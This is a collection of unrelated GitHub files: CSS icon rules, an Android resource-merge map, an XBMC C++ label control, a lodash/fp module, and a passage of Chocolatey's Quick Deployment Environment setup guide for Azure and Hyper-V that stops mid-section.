content: '\f0a8'} /*  */ .icon.move.left:before { content: '\f074'} /*  */ .icon.move.right:before { content: '\f0a9'} /*  */ .icon.move.up:before { content: '\f0a7'} /*  */ .icon.mute:before { content: '\f080'} /*  */ .icon.no.newline:before { content: '\f09c'} /*  */ .icon.octoface:before { content: '\f008'} /*  */ .icon.organization:before { content: '\f037'} /*  */ .icon.package:before { content: '\f0c4'} /*  */ .icon.paintcan:before { content: '\f0d1'} /*  */ .icon.pencil:before { content: '\f058'} /*  */ .icon.person.add:before, .icon.person.follow:before, .icon.person:before { content: '\f018'} /*  */ .icon.pin:before { content: '\f041'} /*  */ .icon.playback.fast.forward:before { content: '\f0bd'} /*  */ .icon.playback.pause:before { content: '\f0bb'} /*  */ .icon.playback.play:before { content: '\f0bf'} /*  */ .icon.playback.rewind:before { content: '\f0bc'} /*  */ .icon.plug:before { content: '\f0d4'} /*  */ .icon.repo.create:before, .icon.gist.new:before, .icon.file.directory.create:before, .icon.file.add:before, .icon.plus:before { content: '\f05d'} /*  */ .icon.podium:before { content: '\f0af'} /*  */ .icon.primitive.dot:before { content: '\f052'} /*  */ .icon.primitive.square:before { content: '\f053'} /*  */ .icon.pulse:before { content: '\f085'} /*  */ .icon.puzzle:before { content: '\f0c0'} /*  */ .icon.question:before { content: '\f02c'} /*  */ .icon.quote:before { content: '\f063'} /*  */ .icon.radio.tower:before { content: '\f030'} /*  */ .icon.repo.delete:before, .icon.repo:before { content: '\f001'} /*  */ .icon.repo.clone:before { content: '\f04c'} /*  */ .icon.repo.force.push:before { content: '\f04a'} /*  */ .icon.gist.fork:before, .icon.repo.forked:before { content: '\f002'} /*  */ .icon.repo.pull:before { content: '\f006'} /*  */ .icon.repo.push:before { content: '\f005'} /*  */ .icon.rocket:before { content: '\f033'} /*  */ .icon.rss:before { content: '\f034'} /*  */ .icon.ruby:before { content: '\f047'} /*  */ .icon.screen.full:before { content: '\f066'} /*  */ .icon.screen.normal:before { content: '\f067'} /*  */ .icon.search.save:before, .icon.search:before { content: '\f02e'} /*  */ .icon.server:before { content: '\f097'} /*  */ .icon.settings:before { content: '\f07c'} /*  */ .icon.log.in:before, .icon.sign.in:before { content: '\f036'} /*  */ .icon.log.out:before, .icon.sign.out:before { content: '\f032'} /*  */ .icon.split:before { content: '\f0c6'} /*  */ .icon.squirrel:before { content: '\f0b2'} /*  */ .icon.star.add:before, .icon.star.delete:before, .icon.star:before { content: '\f02a'} /*  */ .icon.steps:before { content: '\f0c7'} /*  */ .icon.stop:before { content: '\f08f'} /*  */ .icon.repo.sync:before, .icon.sync:before { content: '\f087'} /*  */ .icon.tag.remove:before, .icon.tag.add:before, .icon.tag:before { content: '\f015'} /*  */ .icon.telescope:before { content: '\f088'} /*  */ .icon.terminal:before { content: '\f0c8'} /*  */ .icon.three.bars:before { content: '\f05e'} /*  */ .icon.thumbsdown:before { content: '\f0db'} /*  */ .icon.thumbsup:before { content: '\f0da'} /*  */ .icon.tools:before { content: '\f031'} /*  */ .icon.trashcan:before { content: '\f0d0'} /*  */ .icon.triangle.down:before { content: '\f05b'} /*  */ .icon.triangle.left:before { content: '\f044'} /*  */ .icon.triangle.right:before { content: '\f05a'} /*  */ .icon.triangle.up:before { content: '\f0aa'} /*  */ .icon.unfold:before { content: '\f039'} /*  */ .icon.unmute:before { content: '\f0ba'} /*  */ .icon.versions:before { content: '\f064'} /*  */ .icon.remove.close:before, .icon.x:before { content: '\f081'} /*  */ .icon.zap:before { content: '\26A1'} /* ⚡ */
{ "pile_set_name": "Github" }
[ { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_tile_bg.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_tile_bg.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xxhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xxhdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-v21_notification_action_background.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-v21\\notification_action_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_template_custom_big.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_template_custom_big.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_icon_group.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_icon_group.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_action.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_action.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_action.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_action.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_bg_low.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_bg_low.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_action_tombstone.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_action_tombstone.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_part_time.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_part_time.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-mdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-mdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v16_notification_template_custom_big.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v16\\notification_template_custom_big.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_icon_background.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_icon_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_custom_dialog.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\custom_dialog.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_notification_bg.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable\\notification_bg.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable_launch_background.xml.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\drawable\\launch_background.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xhdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-hdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-hdpi\\ic_launcher.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_action_tombstone.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_action_tombstone.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout_notification_template_part_chronometer.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout\\notification_template_part_chronometer.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notify_panel_notification_icon_bg.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notify_panel_notification_icon_bg.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_low_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_low_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-mdpi-v4_notification_bg_low_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-mdpi-v4\\notification_bg_low_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\layout-v21_notification_template_icon_group.xml.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\layout-v21\\notification_template_icon_group.xml" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-hdpi-v4_notification_bg_normal_pressed.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-hdpi-v4\\notification_bg_normal_pressed.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\drawable-xhdpi-v4_notification_bg_normal.9.png.flat", "source": "C:\\Users\\Administrator\\.gradle\\caches\\transforms-2\\files-2.1\\a528b13ac93e64cafa3d0480e2c93207\\core-1.1.0\\res\\drawable-xhdpi-v4\\notification_bg_normal.9.png" }, { "merged": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\build\\app\\intermediates\\res\\merged\\debug\\mipmap-xxxhdpi_ic_launcher.png.flat", "source": "C:\\Users\\Administrator\\source\\repos\\douyinappcn\\flutter_app_cn\\android\\app\\src\\main\\res\\mipmap-xxxhdpi\\ic_launcher.png" } ]
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2013 Team XBMC * http://xbmc.org * * This Program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This Program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with XBMC; see the file COPYING. If not, see * <http://www.gnu.org/licenses/>. * */ #include "GUIListLabel.h" #include <limits> #include "addons/Skin.h" CGUIListLabel::CGUIListLabel(int parentID, int controlID, float posX, float posY, float width, float height, const CLabelInfo& labelInfo, const CGUIInfoLabel &info, CGUIControl::GUISCROLLVALUE scroll) : CGUIControl(parentID, controlID, posX, posY, width, height) , m_label(posX, posY, width, height, labelInfo, (scroll == CGUIControl::ALWAYS) ? CGUILabel::OVER_FLOW_SCROLL : CGUILabel::OVER_FLOW_TRUNCATE) , m_info(info) { m_scroll = scroll; if (g_SkinInfo && g_SkinInfo->APIVersion() < ADDON::AddonVersion("5.1.0")) { if (labelInfo.align & XBFONT_RIGHT) m_label.SetMaxRect(m_posX - m_width, m_posY, m_width, m_height); else if (labelInfo.align & XBFONT_CENTER_X) m_label.SetMaxRect(m_posX - m_width*0.5f, m_posY, m_width, m_height); } if (m_info.IsConstant()) SetLabel(m_info.GetLabel(m_parentID, true)); ControlType = GUICONTROL_LISTLABEL; } CGUIListLabel::~CGUIListLabel(void) { } void CGUIListLabel::SetScrolling(bool scrolling) { if (m_scroll == CGUIControl::FOCUS) m_label.SetScrolling(scrolling); else m_label.SetScrolling((m_scroll == CGUIControl::ALWAYS) ? true : false); } void CGUIListLabel::SetSelected(bool selected) { if(m_label.SetColor(selected ? CGUILabel::COLOR_SELECTED : CGUILabel::COLOR_TEXT)) SetInvalid(); } void CGUIListLabel::SetFocus(bool focus) { CGUIControl::SetFocus(focus); if (!focus) SetScrolling(false); } CRect CGUIListLabel::CalcRenderRegion() const { return m_label.GetRenderRect(); } const CRect CGUIListLabel::GetSelectionRenderRect() { return m_label.GetRenderRect(); } bool CGUIListLabel::UpdateColors() { bool changed = CGUIControl::UpdateColors(); changed |= m_label.UpdateColors(); return changed; } void CGUIListLabel::Process(unsigned int currentTime, CDirtyRegionList &dirtyregions) { if (m_label.Process(currentTime)) MarkDirtyRegion(); CGUIControl::Process(currentTime, dirtyregions); } void CGUIListLabel::Render() { m_label.Render(); CGUIControl::Render(); } void CGUIListLabel::UpdateInfo(const CGUIListItem *item) { if (m_info.IsConstant() && !m_bInvalidated) return; // nothing to do if (item) SetLabel(m_info.GetItemLabel(item)); else SetLabel(m_info.GetLabel(m_parentID, true)); } void CGUIListLabel::SetInvalid() { m_label.SetInvalid(); CGUIControl::SetInvalid(); } void CGUIListLabel::SetWidth(float width) { m_width = width; if (m_label.GetLabelInfo().align & XBFONT_RIGHT) m_label.SetMaxRect(m_posX - m_width, m_posY, m_width, m_height); else if (m_label.GetLabelInfo().align & XBFONT_CENTER_X) m_label.SetMaxRect(m_posX - m_width*0.5f, m_posY, m_width, m_height); else m_label.SetMaxRect(m_posX, m_posY, m_width, m_height); CGUIControl::SetWidth(m_width); } void CGUIListLabel::SetLabel(const std::string &label) { m_label.SetText(label); }
{ "pile_set_name": "Github" }
var convert = require('./convert'), func = convert('lt', require('../lt')); func.placeholder = require('./placeholder'); module.exports = func;
{ "pile_set_name": "Github" }
# Quick Deployment Environment Setup > :memo: **NOTE** > > This document is for **Version 1** of the Quick Deployment Environment. > If you're using a newer version of QDE, please refer to the [[newer QDE Setup page|QuickDeploymentSetup]]. This document contains instructions for importing the QuickDeploy appliance/VM, or creating a VM and attaching the QuickDeploy disk image to it. You will receive a download link via email for an archive of the VM image. Once you have this downloaded, it will be ready for extraction and import into your environment. > :warning: **WARNING** > > Please follow these steps in ***exact*** order. These will be very important later when you are trying to use the environment. <!-- TOC depthFrom:2 --> - [Step 0: Setup Considerations](#step-0-setup-considerations) - [Step 0.1: QDE Rename Considerations](#step-01-qde-rename-considerations) - [Step 1: Import Virtual Environment](#step-1-import-virtual-environment) - [Platform: Azure](#platform-azure) - [Platform: Hyper-V (Appliance)](#platform-hyper-v-appliance) - [Platform: Hyper-V (VHD file)](#platform-hyper-v-vhd-file) - [Platform: VMware (VMDK file)](#platform-vmware-vmdk-file) - [Platform: VMware (OVF template)](#platform-vmware-ovf-template) - [Platform: Other](#platform-other) - [Step 2: Other Considerations for Virtual Environment](#step-2-other-considerations-for-virtual-environment) - [Step 2.1: DNS Settings](#step-21-dns-settings) - [Step 3: Virtual Environment Setup](#step-3-virtual-environment-setup) - [Step 3.1: Expand Disk Size](#step-31-expand-disk-size) - [Step 3.2: Add License File to QDE](#step-32-add-license-file-to-qde) - [Step 3.3: Regenerate SSL Certificates](#step-33-regenerate-ssl-certificates) - [Step 3.4: Database Password Changes (Optional)](#step-34-database-password-changes-optional) - [Step 4: Firewall Changes](#step-4-firewall-changes) - [Step 5: Install and Configure Chocolatey on Clients](#step-5-install-and-configure-chocolatey-on-clients) - [FAQ](#faq) - [How do I upgrade QDE?](#how-do-i-upgrade-qde) <!-- /TOC --> ___ ## Step 0: Setup Considerations The following are points to keep in mind during initial setup: * You will need access to AWS to download the environment (specifically `s3.amazonaws.com`). * Hostname/FQDN changes will invalidate all scripts and certificates. Thus, if you plan to change the hostname, you must do so prior to running any setup scripts. If you run into issues, refer to the README file on the desktop of the VM. * Self-signed certificates are generated by default. If you plan to use your own certificates, please reach out to Support for assistance. * The back-end database is configured with no outbound connections - if you plan to change this, please reach out to Support for assistance. * If you intend to use Nexus outside of your corporate network without the use of a VPN, you will be required to configure RBAC on the repositories housed inside of the repository server. This is to ensure that the packages stored on the server are not publicly accessible without authentication. ### Step 0.1: QDE Rename Considerations > :warning: **WARNING** > > tl;dr: Think long and hard before changing the QDE hostname > > Renaming the QDE host requires a lot of things and needs to be completed FIRST prior to ANYTHING that is done on the QDE box. It is strongly recommended **NOT** to rename unless you absolutely need to. The most important reason has to do with how a client installs from QDE - it must learn to trust the QDE certificate. Once renamed, the easy option that's provided for you goes away and you will need to provide a hosted solution with an already trusted certificate. > You can provide your own certificate that is already trusted on machines as part of the [[SSL/TLS Setup|QuickDeploymentSslSetup]]. Your other option is to host the script to trust the certificate with an already trusted certificate. You will find a template that you will need to edit at `c:\choco_setup_files` (in the QDE) named `Import-ChocoServerCertificate.ps1`. > > Please contact support if you need help here. If you rename the QDE Environment, here's a small list of things you'll need to do: 1. Update scripts in Nexus that are currently pointed to the default QDE name. 1. Regenerate SSL Certificates 1. Deploy the Nexus SSL Certificate public key to the clients (there is a helper method that is used if the box is not renamed and is limited to that name for security purposes). See `c:\choco_setup_files\Import-ChocoServerCertificate.ps1` for an example of what we mean. 1. There may be more places impacted. Check with support to ensure all is good to go. ___ ## Step 1: Import Virtual Environment Choose one of the following methods for what your hypervisor environment supports. ### Platform: Azure If you choose to use the scripts provided inside the Zip archive, there are a number of pre-requisites that are needed: * The Hyper-V PowerShell module is required. * For Windows 10 run `Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Management-PowerShell` from an elevated PowerShell prompt. * For Windows Server 2012 and later, run `Install-WindowsFeature -Name Hyper-V-PowerShell` from an elevated PowerShell prompt. * Having both the `Az` and `AzureRm` PowerShell modules installed is not [supported](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-4.3.0#install-the-azure-powershell-module). You can see if you have `AzureRm` installed by running `Get-Module -Name AzureRm -ListAvilable`. If there is no output it is not installed. * Install the `Az` PowerShell Module. To find out if you have the module installed run `Get-Module -Name az -ListAvailable` from an elevated PowerShell session. * To install the `Az` module using Chocolatey, run `choco install az.powershell -y`. * Using PowerShell `Install-Module -Name Az -AllowClobber -Scope CurrentUser`. * For the Azure PowerShell module you will need _either_ PowerShell 5.1 and .NET 4.7.2 **or** PowerShell Core installed: * PowerShell 5.1 and .NET 4.7.2: * You can find out the current version of PowerShell you are running using the command `$PsVersionTable.PSVersion` from a PowerShell session. * To install PowerShell 5.1 use Chocolatey by running `choco install powershell -y` or see [Microsoft Docs](https://docs.microsoft.com/en-us/powershell/scripting/windows-powershell/install/installing-windows-powershell?view=powershell-7#upgrading-existing-windows-powershell). * To install .NET 4.7.2 use Chocolatey by running `choco install dotnet4.7.2 -y` or see the [Microsoft docs](https://docs.microsoft.com/en-us/dotnet/framework/install/). * PowerShell Core: * To install PowerShell Core use Chocolatey by running `choco install powershell-core -y` or see the [Microsoft Docs](https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-windows?view=powershell-7). * AzCopy v10 or later - this is needed to copy the disk to Azure. To find out if you have `azcopy` installed and which version, run `azcopy --version`. * To install AzCopy v10 or later, using Chocolatey run `choco install azcopy10 -y` or see the [Microsoft Docs](https://docs.microsoft.com/en-us/azure/storage/common/storage-use-azcopy-v10#download-and-install-azcopy). * The scripts provided with the QDE virtual machine disk image have defaults that you need to ensure you are comfortable with and extensive help. You can see the help, and the default, by running `Get-Help <SCRIPT-NAME> -full`. * The scripts will create resources in Azure which will cost you real money. Please ensure you are comfortable with this before continuing. See above to get help with the scripts. * The execution policy must allow running scripts. If it does not, you can set it _for the current PowerShell session_ by running `Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process`. * Any code or scripts must be run in an _elevated_ PowerShell session. Steps to create a QDE virtual machine in Azure: 1. Download the Zip archive containing the Azure virtual machine disk (VHD), and unzip it to the directory you wish to store it in. You should have three files: * `QuickDeployEnvironment-Azure.vhd` * `Set-QDEAzureDisk.ps1` * `New-QDEAzureVM.ps1` 2. While the scripts will do the majority of the hard work needed to create a QDE virtual machine in Azure, we do need to setup a resource group. The default resource group that the scripts will use is `qdeserver-resgrp` however you can supply an existing resource group using the `-ResourceGroupName <YOUR-RESOURCEGROUPNAME>` parameter. To create a resource group run `New-AzResourceGroup -Name <RESOURCEGROUPNAME> -Location <YOUR-AZURE-LOCATION>`. 3. We need convert the disk you have downloaded to the size required, and then upload it to Azure so we can attach it to the QDE virtual machine we will create in the following steps. Note that the script we are about to run contains defaults that should work for the majority of users. However, please run `Get-Help Set-QDEAzureDisk.ps1 -full` to get help on the parameters you can provide and the defaults that have been set. Once you are comfortable, in the directory you extracted the files to, run `.\Set-QDEAzureDisk.ps1 -Verbose <PARAMETERS>` (where `<PARAMETERS>` is any parameters you want to provide). Providing the `-Verbose` switch produces output on the screen. Note that the processes of converting the disk and uploading it can take a long time. 4. Before we connect to the QDE virtual machine in Azure we must reset the password. To create a password we can provide to the next script, run `$qdePwd = '<YOUR-PASSWORD> | ConvertTo-SecureString -AsPlainText -Force` (where `<YOUR-PASSWORD>` is the password you want to set **and is longer than 12 characters**). 5. Once the disk has been uploaded we need to create the QDE virtual machine in Azure and attach the disk we uploaded as the operating system disk. Note that the script we are about to run contains defaults that should work for the majority of users. However, please run `Get-Help New-QDEAzureVM.ps1 -full` to get help on the parameters you can provide and the defaults that have been set. Once you are comfortable, in the directory you extracted the files to, run `.\New-QDEAzureVM.ps1 -Verbose -AdministratorComplexPassword $qdePwd <PARAMETERS>` (where `<PARAMETERS>` is any parameters you want to provide and `$qdePwd` is the password we created in the previous step). Providing the `-Verbose` switch produces output on the screen. 6. Once this is complete the script will output the command you can run to connect to the virtual machine, including the IP address (if you are using the `-Verbose` switch). Use `mstsc.exe /v:<IP-ADDRESS>` to connect and login with the password you created in a previous step. ### Platform: Hyper-V (Appliance) 1. Download zip archive containing the Hyper-V VM directory structure, and unzip it to the directory you wish to store it in. 2. Open Hyper-V Manager, and select `Import Virtual Machine` from the right sidebar (or Action menu), and choose the folder you extracted from the above archive (e.g. ChocoServer). 3. Increase the size of the VHD, for example, to 500GB. Increase to what you feel comfortable with. ```powershell # This only increases the available size of the image # You will still need to increase the space for the C drive Resize-VHD -Path C:\path\to\QuickDeploy Environment.vhd -Size 500GB ``` 4. Windows 10 and Windows Server 2016/2019 version of Hyper-V now come with built-in support for Hyper-V Integration Services, as they automatically get pushed to guest VM's. In older versions of Hyper-V, you should see an option to "Insert Integration Services Setup Disk". You can use this option to install and enable Hyper-V Integration Services. Video 